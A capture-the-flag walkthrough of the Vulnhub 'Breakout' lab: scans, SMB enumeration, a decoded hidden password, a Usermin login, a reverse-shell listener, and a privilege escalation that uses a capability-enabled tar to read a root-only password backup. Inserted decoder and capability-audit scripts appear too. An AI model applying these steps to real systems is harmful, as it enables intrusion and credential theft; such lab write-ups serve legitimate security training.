
Vulnhub 02 Breakout: Detailed Walkthrough

Posted: 2022-11-14 20:37:47  Views: 75
Tags: 02 lib tar 192.168 cyber Breakout breakout var Vulnhub

02 Breakout

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/02_breakout]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.74.0/16   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor
 192.168.56.100  08:00:27:88:e9:8b      1      60  PCS Systemtechnik GmbH
 192.168.56.176  08:00:27:28:88:4b      1      60  PCS Systemtechnik GmbH

Using netdiscover, which ships with Kali Linux, the target host's IP address is identified as 192.168.56.176.

Nmap scan

┌──(kali㉿kali)-[~/Vulnhub/02_breakout]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.176 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-14 06:41 EST
Nmap scan report for bogon (192.168.56.176)
Host is up (0.00038s latency).
Not shown: 65530 closed tcp ports (reset)
PORT      STATE SERVICE     VERSION
80/tcp    open  http        Apache httpd 2.4.51 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.51 (Debian)
139/tcp   open  netbios-ssn Samba smbd 4.6.2
445/tcp   open  netbios-ssn Samba smbd 4.6.2
10000/tcp open  http        MiniServ 1.981 (Webmin httpd)
|_http-title: 200 — Document follows
20000/tcp open  http        MiniServ 1.830 (Webmin httpd)
|_http-title: 200 — Document follows
MAC Address: 08:00:27:28:88:4B (Oracle VirtualBox virtual NIC)

Host script results:
|_clock-skew: 7h59m59s
| smb2-time: 
|   date: 2022-11-14T19:41:16
|_  start_date: N/A
|_nbstat: NetBIOS name: BREAKOUT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.60 seconds

Get Access

Start with the SMB service:

┌──(kali㉿kali)-[~/Vulnhub/02_breakout]
└─$ smbclient -L 192.168.56.176                                
Password for [WORKGROUP\kali]:

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (Samba 4.13.5-Debian)
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
protocol negotiation failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available
                                                                                                                                                                                                                                 
┌──(kali㉿kali)-[~/Vulnhub/02_breakout]
└─$ smbclient //192.168.56.176/IPC$    
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
smb: \> quit
                               

The SMB service exposes no exploitable attack surface.

Port 80 returns the default Apache page, but the page source contains the following:

<!--
don't worry no one will get here, it's safe to share with you my access. Its encrypted :)

++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.


-->

This is an encoded message; decoding it with the Bugku CTF online Brainfuck/Ook decoder gives:

.2uqPEfj3D<P'a-3
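As an added example (not from the original post), a minimal Brainfuck interpreter that decodes the string from the page source offline, so a leaked credential never has to be pasted into a third-party web decoder:

```python
# Added example (not from the original post): a minimal Brainfuck interpreter, so the
# string hidden in the page source can be decoded offline rather than pasted into a
# third-party web decoder. Cells are 8-bit and wrap, like the common online decoders.
# The program from the HTML comment on the port-80 page, one line per output group.
HIDDEN_PROGRAM = (
    "++++++++++[>+>+++>+++++++>++++++++++<<<<-]"  # cells 1..4 = 10, 30, 70, 100
    ">>++++++++++++++++.++++."                    # '.' '2'
    ">>+++++++++++++++++.----."                   # 'u' 'q'
    "<++++++++++.-----------."                    # 'P' 'E'
    ">-----------.++++."                          # 'f' 'j'
    "<<+.>-.--------.++++++++++++++++++++."       # '3' 'D' '<' 'P'
    "<------------."                              # "'"
    ">>---------."                                # 'a'
    "<<++++++.++++++."                            # '-' '3'
)

def run_brainfuck(program: str, cell_bits: int = 8, tape_len: int = 30000) -> str:
    """Execute a Brainfuck program with no input and return what it prints."""
    mask = (1 << cell_bits) - 1
    jump, stack = {}, []  # pre-match brackets: O(1) jumps, unbalanced code rejected
    for i, ch in enumerate(program):
        if ch == "[":
            stack.append(i)
        elif ch == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at offset {i}")
            j = stack.pop()
            jump[i], jump[j] = j, i
    if stack:
        raise ValueError(f"unmatched '[' at offset {stack[-1]}")
    tape, ptr, pc, out = [0] * tape_len, 0, 0, []
    while pc < len(program):
        ch = program[pc]
        if ch == ">":
            ptr += 1
        elif ch == "<":
            ptr -= 1
        elif ch == "+":
            tape[ptr] = (tape[ptr] + 1) & mask
        elif ch == "-":
            tape[ptr] = (tape[ptr] - 1) & mask
        elif ch == ".":
            out.append(chr(tape[ptr]))
        elif ch == "[" and tape[ptr] == 0:
            pc = jump[pc]  # skip the loop body
        elif ch == "]" and tape[ptr] != 0:
            pc = jump[pc]  # back to the matching '['
        pc += 1  # anything else (including ',') is ignored
    return "".join(out)
```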

Ports 10000 and 20000 run Webmin and Usermin respectively.

┌──(kali㉿kali)-[~/Vulnhub/02_breakout]
└─$ enum4linux 192.168.56.176
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon Nov 14 06:51:44 2022

 =========================================( Target Information )=========================================
                                                                                                                                                                                                                                 
Target ........... 192.168.56.176                                                                                                                                                                                                
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===========================( Enumerating Workgroup/Domain on 192.168.56.176 )===========================
                                                                                                                                                                                                                                 
                                                                                                                                                                                                                                 
[+] Got domain/workgroup name: WORKGROUP     

 =================( Users on 192.168.56.176 via RID cycling (RIDS: 500-550,1000-1050) )=================
                                                                                                                                                                                                                                 
                                                                                                                                                                                                                                 
[I] Found new SID:                                                                                                                                                                                                               
S-1-22-1                                                                                                                                                                                                                         

[I] Found new SID:                                                                                                                                                                                                               
S-1-5-32                                                                                                                                                                                                                         

[I] Found new SID:                                                                                                                                                                                                               
S-1-5-32                                                                                                                                                                                                                         

[I] Found new SID:                                                                                                                                                                                                               
S-1-5-32                                                                                                                                                                                                                         

[I] Found new SID:                                                                                                                                                                                                               
S-1-5-32                                                                                                                                                                                                                         

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''                                                                                                                                                      
                                                                                                                                                                                                                                 
S-1-22-1-1000 Unix User\cyber (Local User)                                                                                                                                                                                       

[+] Enumerating users using SID S-1-5-32 and logon username '', password ''                                                                                                                                                      
                                                                                                                                                                                                                                 
S-1-5-32-544 BUILTIN\Administrators (Local Group)                                                                                                                                                                                
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
     

The username cyber has been found.

Trying this username with the password obtained earlier against ports 10000 and 20000 shows that only port 20000 accepts the login.

The bottom-left corner of the page offers a command-execution feature.

Next, obtain a reverse shell:

┌──(kali㉿kali)-[~/Vulnhub/02_breakout]
└─$ sudo nc -nlvp 5555
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.176] 57644
bash: cannot set terminal process group (1336): Inappropriate ioctl for device
bash: no job control in this shell
cyber@breakout:~$ id
id
uid=1000(cyber) gid=1000(cyber) groups=1000(cyber),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
cyber@breakout:~$ bash -i
bash -i
bash: cannot set terminal process group (1336): Inappropriate ioctl for device
bash: no job control in this shell
cyber@breakout:~$ 

Privilege escalation

After uploading the linpeas.sh script to the target, no SUID programs are found.

cyber@breakout:~$ getcap tar
getcap tar
tar cap_dac_read_search=ep
cyber@breakout:~$ 

The tar binary in the user's home directory can therefore read sensitive files: cap_dac_read_search lets it bypass file read and directory search permission checks.
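An added example, not from the original post: a Python audit helper that decodes the security.capability extended attribute behind the getcap output above and walks a directory tree for binaries carrying capabilities such as cap_dac_read_search, so a defender can find them before an attacker does. The vfs_cap_data layout and capability numbers follow linux/capability.h; the sample xattr bytes are constructed.

```python
# Added example (not from the original post): decode the security.capability
# xattr that getcap reads and report binaries whose file capabilities bypass
# DAC checks, as the tar in cyber's home directory did (cap_dac_read_search).
import os
import struct

VFS_CAP_FLAGS_EFFECTIVE = 0x00000001
VFS_CAP_REVISION_MASK = 0xFF000000
# Capability numbers from linux/capability.h (subset; others print as cap_N).
CAP_NAMES = {0: "cap_chown", 1: "cap_dac_override", 2: "cap_dac_read_search",
             3: "cap_fowner", 6: "cap_setgid", 7: "cap_setuid", 13: "cap_net_raw",
             19: "cap_sys_ptrace", 21: "cap_sys_admin", 31: "cap_setfcap"}
RISKY_CAPS = {1, 2, 3, 6, 7, 19, 21, 31}  # read, modify or take over beyond the caller's rights
# Constructed sample: vfs_cap_data v2 bytes behind "cap_dac_read_search=ep" (bit 2, effective set).
TAR_XATTR = struct.pack("<IIIII", 0x02000001, 1 << 2, 0, 0, 0)

def parse_vfs_cap(raw: bytes) -> tuple[int, str]:
    """Return (capability bitmask, flags) with flags in getcap's 'eip' letters."""
    (magic_etc,) = struct.unpack_from("<I", raw, 0)
    words = {0x01000000: 1, 0x02000000: 2, 0x03000000: 2}.get(magic_etc & VFS_CAP_REVISION_MASK)
    if words is None or len(raw) < 4 + 8 * words:
        raise ValueError("unknown revision or truncated vfs_cap_data")
    permitted = inheritable = 0
    for w in range(words):  # word w holds capabilities 32*w .. 32*w+31
        p, i = struct.unpack_from("<II", raw, 4 + 8 * w)
        permitted |= p << (32 * w)
        inheritable |= i << (32 * w)
    flags = "e" if magic_etc & VFS_CAP_FLAGS_EFFECTIVE else ""
    flags += ("i" if inheritable else "") + ("p" if permitted else "")
    return permitted | inheritable, flags  # simplification: one mask for both sets

def cap_text(raw: bytes) -> str:
    """Render a security.capability value the way getcap prints it."""
    bits, flags = parse_vfs_cap(raw)
    return ",".join(CAP_NAMES.get(n, f"cap_{n}") for n in range(64) if bits >> n & 1) + "=" + flags

def is_risky(raw: bytes) -> bool:
    return any(parse_vfs_cap(raw)[0] >> n & 1 for n in RISKY_CAPS)

def audit_tree(root: str) -> list[tuple[str, str]]:
    findings = []  # (path, getcap-style text) for every file carrying a risky capability
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                raw = os.getxattr(path, "security.capability", follow_symlinks=False)
            except OSError:  # no capability xattr, or file not readable
                continue
            if is_risky(raw):
                findings.append((path, cap_text(raw)))
    return findings
```

From a shell, getcap -r / 2>/dev/null covers the same ground; the value of scripting it is that the check can run periodically and alert on capability-bearing binaries appearing in user-owned directories.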

Search for files whose names contain "pass":

find / -name '*pass*' 2>/dev/null
/var/backups/.old_pass.bak
/var/lib/dpkg/info/base-passwd.list
/var/lib/dpkg/info/base-passwd.postinst
/var/lib/dpkg/info/base-passwd.md5sums
/var/lib/dpkg/info/passwd.list
/var/lib/dpkg/info/base-passwd.templates
/var/lib/dpkg/info/base-passwd.preinst
/var/lib/dpkg/info/passwd.conffiles
/var/lib/dpkg/info/passwd.md5sums
/var/lib/dpkg/info/passwd.preinst
/var/lib/dpkg/info/passwd.postrm
/var/lib/dpkg/info/passwd.postinst
/var/lib/dpkg/info/base-passwd.postrm
/var/lib/dpkg/info/passwd.prerm
/var/lib/pam/password
/var/lib/samba/private/passdb.tdb
/var/cache/debconf/passwords.dat
/boot/grub/i386-pc/password.mod
/boot/grub/i386-pc/legacy_password_test.mod
/boot/grub/i386-pc/password_pbkdf2.mod
/run/systemd/ask-password
cyber@breakout:~$           

ls -alh /var/backups/.old_pass.bak
-rw------- 1 root root 17 Oct 20  2021 /var/backups/.old_pass.bak

This file belongs to root; check whether the tar binary can read it out:

cyber@breakout:~$ ./tar -cf bak.tar /var/backups/.old_pass.bak
./tar -cf bak.tar /var/backups/.old_pass.bak
./tar: Removing leading `/' from member names
cyber@breakout:~$ ls
ls
bak.tar
tar
user.txt
cyber@breakout:~$ tar -xf bak.tar
tar -xf bak.tar
cyber@breakout:~$ ls
ls
bak.tar
tar
user.txt
var
cyber@breakout:~$ cd var
cd var
cyber@breakout:~/var$ ls -alh
ls -alh
total 12K
drwxr-xr-x 3 cyber cyber 4.0K Nov 14 15:14 .
drwxr-xr-x 9 cyber cyber 4.0K Nov 14 15:14 ..
drwxr-xr-x 2 cyber cyber 4.0K Nov 14 15:14 backups
cyber@breakout:~/var$ cd backups
cd backups
cyber@breakout:~/var/backups$ ls
ls
cyber@breakout:~/var/backups$ ls -alh
ls -alh
total 12K
drwxr-xr-x 2 cyber cyber 4.0K Nov 14 15:14 .
drwxr-xr-x 3 cyber cyber 4.0K Nov 14 15:14 ..
-rw------- 1 cyber cyber   17 Oct 20  2021 .old_pass.bak
cyber@breakout:~/var/backups$ cat .old_pass.bak
cat .old_pass.bak
Ts&4&YurgtRX(=~h
cyber@breakout:~/var/backups$ 

Use this password to switch to the root user.


From: https://www.cnblogs.com/jason-huawen/p/16890290.html
